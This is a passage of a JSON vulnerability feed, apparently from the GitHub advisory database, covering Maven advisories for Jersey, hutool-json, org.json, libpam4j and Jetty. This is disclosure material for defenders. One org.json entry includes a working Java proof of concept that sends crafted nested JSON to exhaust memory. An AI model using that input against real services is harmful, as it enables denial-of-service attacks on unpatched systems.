"pkg:maven/org.glassfish.jersey.core/jersey-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.28" }, { "fixed": "2.34" } ] } ], "versions": [ "2.28", "2.29", "2.29.1", "2.30", "2.30.1", "2.31", "2.32", "2.33" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.33", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-c43q-5hpj-4crv/GHSA-c43q-5hpj-4crv.json" } }, { "package": { "name": "org.glassfish.jersey.core:jersey-common", "ecosystem": "Maven", "purl": "pkg:maven/org.glassfish.jersey.core/jersey-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.0.0" }, { "fixed": "3.0.2" } ] } ], "versions": [ "3.0.0", "3.0.1" ], "database_specific": { "last_known_affected_version_range": "\u003c= 3.0.1", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-c43q-5hpj-4crv/GHSA-c43q-5hpj-4crv.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/eclipse-ee4j/jersey/security/advisories/GHSA-c43q-5hpj-4crv" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-28168" }, { "type": "WEB", "url": "https://github.com/eclipse-ee4j/jersey/pull/4712" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdff6939e6c8dd620e20b013d9a35f57d42b3cd19e1d0483d85dfa2fd@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd54b42edccc1b993853a9c4943a9b16db763f5e2febf6e64b7d0fe3c@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc6221670de35b819fe191e7d8f2d17bc000549bd554020cec644b71e@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc288874c330b3af9e29a1a114c5e0d24fff7a79eaa341f551535c8c0@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rafc3c4cee534f478cbf8acf91e48373e291a21151f030e8132662a7b@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra3d7cd37fc794981a885332af2f8df0d873753380ea19935d6d847fc@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra3290fe51b4546fac195724c4187c4cb7fc5809bc596c2f7e97606f4@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra2722171d569370a9e15147d9f3f6138ad9a188ee879c0156aa2d73a@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r96658b899fcdbf04947257d201dc5a0abdbb5fb0a8f4ec0a6c15e70f@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6dadc8fe82071aba841d673ffadf34728bff4357796b1990a66e3af1@%3Ccommits.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r454f38e85db149869c5a92c993c402260a4f8599bf283f6cfaada972@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r42fef440487a04cf5e487a9707ef5119d2dd5b809919f25ef4296fc4@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4066176a7352e021d7a81af460044bde8d57f40e98f8e4a31923af3a@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r305fb82e5c005143c1e2ec986a19c0a44f42189ab2580344dc955359@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r280438f7cb4b3b1c9dfda9d7b05fa2a5cfab68618c6afee8169ecdaa@%3Ccommits.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2721aba31a8562639c4b937150897e24f78f747cdbda8641c0f659fe@%3Cusers.kafka.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-378", "CWE-379", "CWE-668", "CWE-732" ], "github_reviewed": true, "github_reviewed_at": "2021-04-22T19:22:31Z", "nvd_published_at": "2021-04-22T18:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-3vqj-43w4-2q58", "published": "2022-12-13T15:30:26Z", "modified": "2024-04-15T20:32:09.965200Z", "aliases": [ "CVE-2022-45688" ], "summary": "json stack overflow vulnerability", "details": "A stack overflow in the XML.toJSONObject component of hutool-json v5.8.10 and org.json:json before version 20230227 allows attackers to cause a Denial of Service (DoS) via crafted JSON or XML data.", "affected": [ { "package": { "name": "cn.hutool:hutool-json", "ecosystem": "Maven", "purl": "pkg:maven/cn.hutool/hutool-json" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "5.8.25" } ] } ], "versions": [ "4.0.0", "4.0.1", "4.0.10", "4.0.11", "4.0.12", "4.0.2", "4.0.3", "4.0.4", "4.0.5", "4.0.6", "4.0.7", "4.0.8", "4.0.9", "4.1.0", "4.1.1", "4.1.10", "4.1.11", "4.1.12", "4.1.13", "4.1.14", "4.1.15", "4.1.16", "4.1.17", "4.1.18", "4.1.19", "4.1.2", "4.1.20", "4.1.21", "4.1.3", "4.1.4", "4.1.5", "4.1.6", "4.1.7", "4.1.8", "4.1.9", "4.2.1", "4.3.0", "4.3.1", "4.3.2", "4.4.0", "4.4.1", "4.4.2", "4.4.3", "4.4.4", "4.4.5", "4.5.0", "4.5.1", "4.5.10", "4.5.11", "4.5.12", "4.5.13", "4.5.14", "4.5.15", "4.5.16", "4.5.17", "4.5.18", "4.5.2", "4.5.3", "4.5.4", "4.5.5", "4.5.6", "4.5.7", "4.5.8", "4.5.9", "4.6.0", "4.6.1", "4.6.10", "4.6.11", "4.6.12", "4.6.13", "4.6.14", "4.6.15", "4.6.16", "4.6.17", "4.6.2", "4.6.3", "4.6.4", "4.6.5", "4.6.6", "4.6.7", "4.6.8", "5.0.0", "5.0.1", "5.0.2", "5.0.3", "5.0.4", "5.0.5", "5.0.6", "5.0.7", "5.1.0", "5.1.1", "5.1.2", "5.1.3", "5.1.4", "5.1.5", "5.2.0", "5.2.1", "5.2.2", "5.2.3", "5.2.4", "5.2.5", "5.3.0", "5.3.1", "5.3.10", "5.3.2", "5.3.3", "5.3.4", "5.3.5", "5.3.6", "5.3.7", "5.3.8", "5.3.9", "5.4.0", "5.4.1", "5.4.2", "5.4.3", "5.4.4", "5.4.5", "5.4.6", "5.4.7", "5.5.0", "5.5.1", "5.5.2", "5.5.3", "5.5.4", "5.5.5", "5.5.6", "5.5.7", "5.5.8", "5.5.9", "5.6.0", "5.6.1", "5.6.2", "5.6.3", "5.6.4", "5.6.5", "5.6.6", "5.6.7", "5.7.0", "5.7.1", "5.7.10", "5.7.11", "5.7.12", "5.7.13", "5.7.14", "5.7.15", "5.7.16", "5.7.17", "5.7.18", "5.7.19", "5.7.2", "5.7.20", "5.7.21", "5.7.22", "5.7.3", "5.7.4", "5.7.5", "5.7.6", "5.7.7", "5.7.8", "5.7.9", "5.8.0", "5.8.0.M1", "5.8.0.M2", "5.8.0.M3", "5.8.0.M4", "5.8.1", "5.8.10", "5.8.11", "5.8.12", "5.8.13", "5.8.14", "5.8.15", "5.8.16", "5.8.17", "5.8.18", "5.8.19", "5.8.2", "5.8.20", "5.8.21", "5.8.22", "5.8.23", "5.8.24", "5.8.3", "5.8.4", "5.8.4.M1", "5.8.5", "5.8.6", "5.8.7", "5.8.8", "5.8.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-3vqj-43w4-2q58/GHSA-3vqj-43w4-2q58.json" } }, { "package": { "name": "org.json:json", "ecosystem": "Maven", "purl": "pkg:maven/org.json/json" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "20230227" } ] } ], "versions": [ "20070829", "20080701", "20090211", "20131018", "20140107", "20141113", "20150729", "20151123", "20160212", "20160807", "20160810", "20170516", "20171018", "20180130", "20180813", "20190722", "20200518", "20201115", "20210307", "20211205", "20220320", "20220924" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-3vqj-43w4-2q58/GHSA-3vqj-43w4-2q58.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-45688" }, { "type": "WEB", "url": "https://github.com/dromara/hutool/issues/2748" }, { "type": "WEB", "url": "https://github.com/stleary/JSON-java/issues/708" }, { "type": "WEB", "url": "https://github.com/dromara/hutool/commit/6a2b585de0a380e8c12016dbaa1620b69be11b8c" }, { "type": "WEB", "url": "https://github.com/stleary/JSON-java/commit/a6e412bded7a0ad605adfeca029318f184c32102" }, { "type": "WEB", "url": "https://github.com/dromara/hutool/releases/tag/5.8.25" } ], "database_specific": { "cwe_ids": [ "CWE-787" ], "github_reviewed": true, "github_reviewed_at": "2022-12-13T19:25:03Z", "nvd_published_at": "2022-12-13T15:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-4jq9-2xhw-jpx7", "published": "2023-11-14T22:24:08Z", "modified": "2025-08-22T21:25:08.510140Z", "aliases": [ "CVE-2023-5072" ], "related": [ "CGA-7g9h-xgv7-r8j3" ], "summary": "Java: DoS Vulnerability in JSON-JAVA", "details": "### Summary\nA denial of service vulnerability in JSON-Java was discovered by [ClusterFuzz](https://google.github.io/clusterfuzz/). A bug in the parser means that an input string of modest size can lead to indefinite amounts of memory being used. There are two issues: (1) the parser bug can be used to circumvent a check that is supposed to prevent the key in a JSON object from itself being another JSON object; (2) if a key does end up being a JSON object then it gets converted into a string, using `\\` to escape special characters, including `\\` itself. So by nesting JSON objects, with a key that is a JSON object that has a key that is a JSON object, and so on, we can get an exponential number of `\\` characters in the escaped string.\n\n### Severity\nHigh - Because this is an already-fixed DoS vulnerability, the only remaining impact possible is for existing binaries that have not been updated yet.\n\n### Proof of Concept\n```java\npackage orgjsonbug;\n\nimport org.json.JSONObject;\n\n/**\n * Illustrates a bug in JSON-Java.\n */\npublic class Bug {\n private static String makeNested(int depth) {\n if (depth == 0) {\n return \"{\\\"a\\\":1}\";\n }\n return \"{\\\"a\\\":1;\\t\\0\" + makeNested(depth - 1) + \":1}\";\n }\n\n public static void main(String[] args) {\n String input = makeNested(30);\n System.out.printf(\"Input string has length %d: %s\\n\", input.length(), input);\n JSONObject output = new JSONObject(input);\n System.out.printf(\"Output JSONObject has length %d: %s\\n\", output.toString().length(), output);\n }\n}\n```\nWhen run, this reports that the input string has length 367. Then, after a long pause, the program crashes inside new JSONObject with OutOfMemoryError.\n\n### Further Analysis\nThe issue is fixed by [this PR](https://github.com/stleary/JSON-java/pull/759).\n\n### Timeline\n**Date reported**: 07/14/2023\n**Date fixed**: \n**Date disclosed**: 10/12/2023", "affected": [ { "package": { "name": "org.json:json", "ecosystem": "Maven", "purl": "pkg:maven/org.json/json" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "20231013" } ] } ], "versions": [ "20070829", "20080701", "20090211", "20131018", "20140107", "20141113", "20150729", "20151123", "20160212", "20160807", "20160810", "20170516", "20171018", "20180130", "20180813", "20190722", "20200518", "20201115", "20210307", "20211205", "20220320", "20220924", "20230227", "20230618" ], "database_specific": { "last_known_affected_version_range": "\u003c= 20230618", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-4jq9-2xhw-jpx7/GHSA-4jq9-2xhw-jpx7.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/google/security-research/security/advisories/GHSA-4jq9-2xhw-jpx7" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5072" }, { "type": "WEB", "url": "https://github.com/stleary/JSON-java/issues/758" }, { "type": "WEB", "url": "https://github.com/stleary/JSON-java/issues/771" }, { "type": "WEB", "url": "https://github.com/stleary/JSON-java/pull/759" }, { "type": "WEB", "url": "https://github.com/stleary/JSON-java/commit/60662e2f8384d3449822a3a1179bfe8de67b55bb" }, { "type": "PACKAGE", "url": "https://github.com/stleary/JSON-java" } ], "database_specific": { "cwe_ids": [ "CWE-358" ], "github_reviewed": true, "github_reviewed_at": "2023-11-14T22:24:08Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-x9rg-q5fx-fx66", "published": "2022-05-13T01:38:10Z", "modified": "2023-11-08T03:58:52.089972Z", "aliases": [ "CVE-2017-12197" ], "summary": "Improper Input Validation in libpam4j", "details": "It was found that libpam4j prior to 1.10 did not properly validate user accounts when authenticating. A user with a valid password for a disabled account would be able to bypass security restrictions and possibly access sensitive information.", "affected": [ { "package": { "name": "org.kohsuke:libpam4j", "ecosystem": "Maven", "purl": "pkg:maven/org.kohsuke/libpam4j" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.10" } ] } ], "versions": [ "1.5", "1.6", "1.7", "1.8", "1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-x9rg-q5fx-fx66/GHSA-x9rg-q5fx-fx66.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-12197" }, { "type": "WEB", "url": "https://github.com/kohsuke/libpam4j/issues/18" }, { "type": "WEB", "url": "https://github.com/kohsuke/libpam4j/commit/02ffdff218283629ba4a902e7fe2fd44646abc21" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:2904" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:2905" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:2906" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1503103" }, { "type": "PACKAGE", "url": "https://github.com/kohsuke/libpam4j" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2017/11/msg00008.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2017/dsa-4025" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2022-07-01T21:27:13Z", "nvd_published_at": "2018-01-18T21:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-4jjw-xrr6-9v3p", "published": "2022-05-01T18:45:22Z", "modified": "2024-12-06T05:26:52.443882Z", "aliases": [ "CVE-2007-6672" ], "summary": "Mortbay Jetty Double Slash URI Information Disclosure Vulnerability", "details": "Mortbay Jetty 6.1.5 and 6.1.6 allows remote attackers to bypass protection mechanisms and read the source of files via multiple `/` (slash) characters in the URI.", "affected": [ { "package": { "name": "org.mortbay.jetty:jetty", "ecosystem": "Maven", "purl": "pkg:maven/org.mortbay.jetty/jetty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "6.1.5" }, { "fixed": "6.1.7" } ] } ], "versions": [ "6.1.5", "6.1.6", "6.1.6rc0", "6.1.6rc1" ], "database_specific": { "last_known_affected_version_range": "\u003c= 6.1.6", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-4jjw-xrr6-9v3p/GHSA-4jjw-xrr6-9v3p.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2007-6672" }, { "type": "WEB", "url": "https://web.archive.org/web/20080113051254/http://www.kb.cert.org/vuls/id/553235" }, { "type": "WEB", "url": "https://web.archive.org/web/20080120225723/http://jira.codehaus.org/browse/JETTY-386" }, { "type": "WEB", "url": "https://web.archive.org/web/20080120225728/http://jira.codehaus.org/browse/JETTY/fixforversion/13950" }, { "type": "WEB", "url": "https://web.archive.org/web/20080517012615/http://www.securityfocus.com/bid/27117" } ], "database_specific": { "cwe_ids": [ "CWE-22" ], "github_reviewed": true, "github_reviewed_at": "2023-08-22T23:30:03Z", "nvd_published_at": "2008-01-08T11:46:00Z", "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-5mq8-h82p-wjf2", "published": "2022-04-30T18:21:21Z", "modified": "2024-11-28T05:41:39.980409Z", "aliases": [ "CVE-2002-1533" ], "summary": "Jetty Javascript Inclusion Vulnerability", "details": "Cross-site scripting (XSS) vulnerability in Jetty JSP servlet engine allows remote attackers to insert arbitrary HTML or script via an HTTP request to a .jsp file whose name contains the malicious script and some encoded linefeed characters (`%0a`).", "affected": [ { "package": { "name": "org.mortbay.jetty:jetty", "ecosystem": "Maven", "purl": "pkg:maven/org.mortbay.jetty/jetty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.1.1" } ] } ], "versions": [ "4.1-rc1", "4.1-rc6", "test-6.0.0", "test-6.0.0rc3", "test-6.0.0rc4", "test-6.0.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/04/GHSA-5mq8-h82p-wjf2/GHSA-5mq8-h82p-wjf2.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2002-1533" }, { "type": "WEB", "url": "https://web.archive.org/web/20040705203137/http://xforce.iss.net/xforce/xfdb/10219" }, { "type": "WEB", "url": "https://web.archive.org/web/20041213153950/http://archives.neohapsis.com/archives/bugtraq/2002-09/0337.html" }, { "type": "WEB", "url": "https://web.archive.org/web/20061020173202/http://www.securityfocus.com/bid/5821" } ], "database_specific": { "cwe_ids": [ "CWE-80" ], "github_reviewed": true, "github_reviewed_at": "2024-02-12T20:43:18Z", "nvd_published_at": "2003-03-31T05:00:00Z", "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-6jxp-7g74-2rc3", "published": "2022-05-02T03:56:13Z", "modified": "2023-11-08T03:56:54.368997Z", "aliases": [ "CVE-2009-4611" ], "summary": "Improper input validation in Mort Bay Jetty", "details": "Mort Bay Jetty 6.x through 6.1.22 and 7.0.0 writes backtrace data without sanitizing non-printable characters, which might allow remote attackers to modify a window's title, or possibly execute arbitrary commands or overwrite files, via an HTTP request containing an escape sequence for a terminal emulator, related to (1) a string value in the Age parameter to the default URI for the Cookie Dump Servlet in test-jetty-webapp/src/main/java/com/acme/CookieDump.java under cookie/, (2) an alphabetic value in the A parameter to jsp/expr.jsp, or (3) an alphabetic value in the Content-Length HTTP header to an arbitrary application.", "affected": [ { "package": { "name": "org.mortbay.jetty:jetty", "ecosystem": "Maven", "purl": "pkg:maven/org.mortbay.jetty/jetty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "6.0.0" }, { "fixed": "6.1.23" } ] } ], "versions": [ "6.0.0", "6.0.1", "6.0.2", "6.1.0", "6.1.0pre0", "6.1.0pre1", "6.1.0pre2", "6.1.0pre3", "6.1.0rc0", "6.1.0rc1", "6.1.0rc2", "6.1.0rc3", "6.1.1", "6.1.10", "6.1.11", "6.1.12", "6.1.12.rc2", "6.1.12.rc3", "6.1.12.rc4", "6.1.12.rc5", "6.1.12rc1", "6.1.14", "6.1.15", "6.1.15.pre0", "6.1.15.rc2", "6.1.15.rc3", "6.1.15.rc4", "6.1.15.rc5", "6.1.16", "6.1.17", "6.1.18", "6.1.19", "6.1.1rc0", "6.1.1rc1", "6.1.2", "6.1.20", "6.1.21", "6.1.22", "6.1.2pre0", "6.1.2pre1", "6.1.2rc0", "6.1.2rc1", "6.1.2rc2", "6.1.2rc4", "6.1.2rc5", "6.1.3", "6.1.4", "6.1.4rc0", "6.1.4rc1", "6.1.5", "6.1.5rc0", "6.1.6", "6.1.6rc0", "6.1.6rc1", "6.1.7", "6.1.8", "6.1.9", "6.1H.10", "6.1H.14", "6.1H.14.1", "6.1H.22", "6.1H.4-beta", "6.1H.4rc1", "6.1H.5-beta", "6.1H.6", "6.1H.7", "6.1H.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-6jxp-7g74-2rc3/GHSA-6jxp-7g74-2rc3.json" } }, { "package": { "name": "org.mortbay.jetty:jetty", "ecosystem": "Maven", "purl": "pkg:maven/org.mortbay.jetty/jetty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "7.0.0" }, { "fixed": "7.0.2" } ] } ], "versions": [ "7.0.0.pre4", "7.0.0.pre5", "7.0.0pre0", "7.0.0pre1", "7.0.0pre2", "7.0.0pre3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-6jxp-7g74-2rc3/GHSA-6jxp-7g74-2rc3.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-4611" }, { "type": "WEB", "url": "https://fossies.org/linux/jetty-distribution/VERSION.txt" }, { "type": "PACKAGE", "url": "https://github.com/eclipse/jetty.project" }, { "type": "WEB", "url": "https://www.eclipse.org/jetty/about.php" }, { "type": "WEB", "url": "http://www.ush.it/team/ush/hack-jetty6x7x/jetty-adv.txt" }, { "type": "WEB", "url": "http://www.ush.it/team/ush/hack_httpd_escape/adv.txt" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2022-06-10T22:42:57Z", "nvd_published_at": "2010-01-13T20:30:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-8h77-9vh5-hw5g", "published": "2022-05-01T18:35:00Z", "modified": "2023-11-08T03:56:48.926359Z", "aliases": [ "CVE-2007-5613" ], "summary": "Mortbay Jetty vulnerable to Cross-site scripting", "details": "Cross-site scripting (XSS) vulnerability in Dump Servlet in Mortbay Jetty before 6.1.6rc1 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters and cookies.", "affected": [ { "package": { "name": "org.mortbay.jetty:jetty", "ecosystem": "Maven", "purl": "pkg:maven/org.mortbay.jetty/jetty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "6.1.6" } ] } ], "versions": [ "4.1-rc1", "4.1-rc6", "4.2.10", "4.2.12", "4.2.2", "4.2.3", "4.2.9", "6.0.0", "6.0.0Beta1", "6.0.0beta1", "6.0.0beta10", "6.0.0beta11", "6.0.0beta12", "6.0.0beta14", "6.0.0beta15", "6.0.0beta16", "6.0.0beta17", "6.0.0beta2", "6.0.0beta3", "6.0.0beta4", "6.0.0beta5", "6.0.0beta6", "6.0.0beta7", "6.0.0beta8", "6.0.0beta9", "6.0.0rc0", "6.0.0rc1", "6.0.0rc2", "6.0.0rc3", "6.0.0rc4", "6.0.1", "6.0.2", "6.1.0", "6.1.0pre0", "6.1.0pre1", "6.1.0pre2", "6.1.0pre3", "6.1.0rc0", "6.1.0rc1", "6.1.0rc2", "6.1.0rc3", "6.1.1", "6.1.1rc0", "6.1.1rc1", "6.1.2", "6.1.2pre0", "6.1.2pre1", "6.1.2rc0", "6.1.2rc1", "6.1.2rc2", "6.1.2rc4", "6.1.2rc5", "6.1.3", "6.1.4", "6.1.4rc0", "6.1.4rc1", "6.1.5", "6.1.5rc0", "6.1.6rc0", "6.1.6rc1", "6.1H.10", "6.1H.14", "6.1H.14.1", "6.1H.22", "6.1H.4-beta", "6.1H.4rc1", "6.1H.5-beta", "6.1H.6", "6.1H.7", "6.1H.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-8h77-9vh5-hw5g/GHSA-8h77-9vh5-hw5g.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2007-5613" }, { "type": "WEB", "url": "https://www.redhat.com/archives/fedora-package-announce/2008-July/msg00227.html" }, { "type": "WEB", "url": "https://www.redhat.com/archives/fedora-package-announce/2008-July/msg00250.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2009-02/msg00002.html" }, { "type": "WEB", "url": "http://www.kb.cert.org/vuls/id/237888" } ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2022-06-07T23:53:04Z", "nvd_published_at": "2007-12-05T11:46:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-966r-962g-2jq5", "published": "2022-05-01T18:35:01Z", "modified": "2024-12-03T06:26:22.232759Z", "aliases": [ "CVE-2007-5615" ], "summary": "Mortbay Jetty CRLF Injection Vulnerability", "details": "CRLF injection vulnerability in Mortbay Jetty before 6.1.6rc0 allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via unspecified vectors.", "affected": [ { "package": { "name": "org.mortbay.jetty:jetty", "ecosystem": "Maven", "purl": "pkg:maven/org.mortbay.jetty/jetty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "6.1.6rc0" } ] } ], "versions": [ "4.1-rc1", "4.1-rc6", "4.2.10", "4.2.12", "4.2.2", "4.2.3", "4.2.9", "6.0.0", "6.0.0Beta1", "6.0.0beta1", "6.0.0beta10", "6.0.0beta11", "6.0.0beta12", "6.0.0beta14", "6.0.0beta15", "6.0.0beta16", "6.0.0beta17", "6.0.0beta2", "6.0.0beta3", "6.0.0beta4", "6.0.0beta5", "6.0.0beta6", "6.0.0beta7", "6.0.0beta8", "6.0.0beta9", "6.0.0rc0", "6.0.0rc1", "6.0.0rc2", "6.0.0rc3", "6.0.0rc4", "6.0.1", "6.0.2", "6.1.0", "6.1.0pre0", "6.1.0pre1", "6.1.0pre2", "6.1.0pre3", "6.1.0rc0", "6.1.0rc1", "6.1.0rc2", "6.1.0rc3", "6.1.1", "6.1.1rc0", "6.1.1rc1", "6.1.2", "6.1.2pre0", "6.1.2pre1", "6.1.2rc0", "6.1.2rc1", "6.1.2rc2", "6.1.2rc4", "6.1.2rc5", "6.1.3", "6.1.4", "6.1.4rc0", "6.1.4rc1", "6.1.5", "6.1.5rc0", "6.1H.10", "6.1H.14", "6.1H.14.1", "6.1H.22", "6.1H.4-beta", "6.1H.4rc1", "6.1H.5-beta", "6.1H.6", "6.1H.7", "6.1H.8", "test-6.0.0", "test-6.0.0rc3", "test-6.0.0rc4", "test-6.0.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-966r-962g-2jq5/GHSA-966r-962g-2jq5.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2007-5615" }, { "type": "WEB", "url": "https://github.com/jetty-project/codehaus-jetty6/commit/0d2592ea3183914163d0921e4855bd3e18582a05" }, { "type": "WEB", "url": "https://web.archive.org/web/20071007232422/http://svn.codehaus.org:80/jetty/jetty/trunk/VERSION.txt" }, { "type": "WEB", "url": "https://web.archive.org/web/20150112202621/http://www.securityfocus.com/bid/26696" }, { "type": "WEB", "url": "https://www.redhat.com/archives/fedora-package-announce/2008-July/msg00227.html" }, { "type": "WEB", "url": "https://www.redhat.com/archives/fedora-package-announce/2008-July/msg00250.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2009-02/msg00002.html" }, { "type": "WEB", "url": "http://www.kb.cert.org/vuls/id/212984" } ], "database_specific": { "cwe_ids": [ "CWE-94" ], "github_reviewed": true, "github_reviewed_at": "2023-09-21T23:12:42Z", "nvd_published_at": "2007-12-05T11:46:00Z", "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-9986-w5h5-vw59", "published": "2022-05-02T03:26:04Z", "modified": "2024-02-16T08:15:58.735824Z", "aliases": [ "CVE-2009-1523" ], "summary": "Directory traversal in Mort Bay Jetty", "details": "Directory traversal vulnerability in the HTTP server in Mort Bay Jetty 5.1.14, 6.x before 6.1.17, and 7.x through 7.0.0.M2 allows remote attackers to access arbitrary files via directory traversal sequences in the URI.", "affected": [ { "package": { "name": "org.mortbay.jetty:jetty", "ecosystem": "Maven", "purl": "pkg:maven/org.mortbay.jetty/jetty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "6.1.17" } ] } ], "versions": [ "4.1-rc1", "4.1-rc6", "4.2.10", "4.2.12", "4.2.2", "4.2.3", "4.2.9", "6.0.0", "6.0.0Beta1", "6.0.0beta1", "6.0.0beta10", "6.0.0beta11", "6.0.0beta12", "6.0.0beta14", "6.0.0beta15", "6.0.0beta16", "6.0.0beta17", "6.0.0beta2", "6.0.0beta3", "6.0.0beta4", "6.0.0beta5", "6.0.0beta6", "6.0.0beta7", "6.0.0beta8", "6.0.0beta9", "6.0.0rc0", "6.0.0rc1", "6.0.0rc2", "6.0.0rc3", "6.0.0rc4", "6.0.1", "6.0.2", "6.1.0", "6.1.0pre0", 